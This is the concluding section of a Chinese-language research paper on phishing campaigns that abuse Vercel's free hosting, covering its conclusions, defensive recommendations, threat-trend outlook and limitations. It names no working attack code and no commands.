测试结果证明，基于行为检测、流量解密、场景化规则、人员培训的闭环防御体系，能够有效应对 Vercel 平台类新型钓鱼攻击，解决了传统防护手段的核心短板。

6 结论与展望

6.1 研究结论

本文以 Kaseya 披露的三起依托 Vercel 免费托管平台的网络钓鱼攻击集群为研究样本，系统完成了攻击载体架构、攻击全链路、核心代码、规避手段的深度解析，结合反网络钓鱼技术专家芦笛的技术观点，分析了传统网络安全防护体系对此类攻击失效的根本原因，并构建了多维度闭环防御体系，主要研究结论如下：

第一，Vercel 等免费云开发托管平台因零成本、低技术门槛、高域名声誉、自动化部署四大核心特性，已成为网络钓鱼攻击者的核心基础设施。攻击者形成了 “AI 生成页面 + 静态托管 + Serverless 中转 + Telegram 自动回传” 的标准化攻击模板，攻击复制能力、规模化能力远超传统钓鱼模式。2025 年 12 月至 2026 年 4 月监测到的三类独立攻击集群，目标覆盖通用企业、建筑行业、求职人群，证明该类威胁已呈现全面扩散态势。

第二，传统以域名黑名单、静态代码特征、明文流量审计为核心的防护手段，无法适配域名快速轮换、代码多样化、全站加密的新型钓鱼攻击。企业普遍存在的白名单放行、CSP 信任策略、人员安全意识短板，进一步放大了攻击风险。单纯依赖单一安全设备无法实现有效防护，必须构建多环节联动的防御体系。

第三，针对 Vercel 类云平台钓鱼攻击的有效防御，需要坚持 “源头管控 + 边界拦截 + 终端兜底 + 人为防线 + 应急处置” 的闭环思路。平台方需强化账号与部署管控，企业需根据业务场景精细化配置访问策略，放弃单纯依赖域名黑名单的思路，转向动态行为检测、加密流量深度解析、组合诱饵规则等新型防护技术，同时配合分场景人员培训与常态化应急演练，才能全面抵御此类威胁。

第四，代码样本分析证实，当前攻击者技术门槛持续下降，无需专业开发能力即可制作高仿真钓鱼页面，未来依托主流可信云平台的钓鱼攻击数量将持续增长，威胁范围也会从凭证窃取向商业机密、金融数据窃取延伸，企业安全团队需将此类威胁纳入常态化重点监控范围。

6.2 威胁演化趋势展望

结合当前攻击特征与云平台技术发展，未来依托免费云托管平台的网络钓鱼攻击将呈现三大演化方向：

AI 技术深度融合：攻击者将进一步利用 Vercel 及同类平台的 AI 工具，生成动态交互钓鱼页面、模拟人工对话的钓鱼站点，欺骗性进一步提升，静态检测难度持续加大；

多平台链路组合：不再局限于单一 Vercel 平台，而是组合使用多个可信云平台拆分攻击链路（页面托管在 Vercel、数据存储在 Firebase、外传通道使用第三方机器人），进一步提升溯源与拦截难度；

定向高阶威胁增多：从通用账号窃取转向针对企业高管、财务人员、核心技术人员的定向钓鱼，结合社工信息制作高度定制化诱饵，目标直指核心商业数据与资金安全。

6.3 后续研究方向

基于本文研究基础，后续可从三个方向开展深化研究：第一，针对主流海外免费托管平台（Vercel、Netlify、Render 等）开展全域威胁测绘，统计恶意子域名分布、攻击类型、目标行业，形成完整的威胁态势报告；第二，优化面向云平台钓鱼页面的 AI 行为检测算法，提升混淆脚本、动态页面的识别准确率；第三，研究轻量化 SSL 解密方案，为中小企业提供低成本的加密流量检测落地思路，推动防御技术的普及应用。

6.4 研究不足

本文研究样本主要来源于 2025 年 12 月至 2026 年 4 月监测到的三类攻击集群，样本范围存在一定局限性，未能覆盖全球范围内所有依托 Vercel 平台的钓鱼变种。同时，本文提出的防御方案在超大型分布式企业、跨国分支机构场景下的适配性，还需结合复杂网络架构做进一步优化。后续研究将补充更多攻击变种样本，完善复杂场景下的防御策略。

编辑：芦笛（公共互联网反网络钓鱼工作组）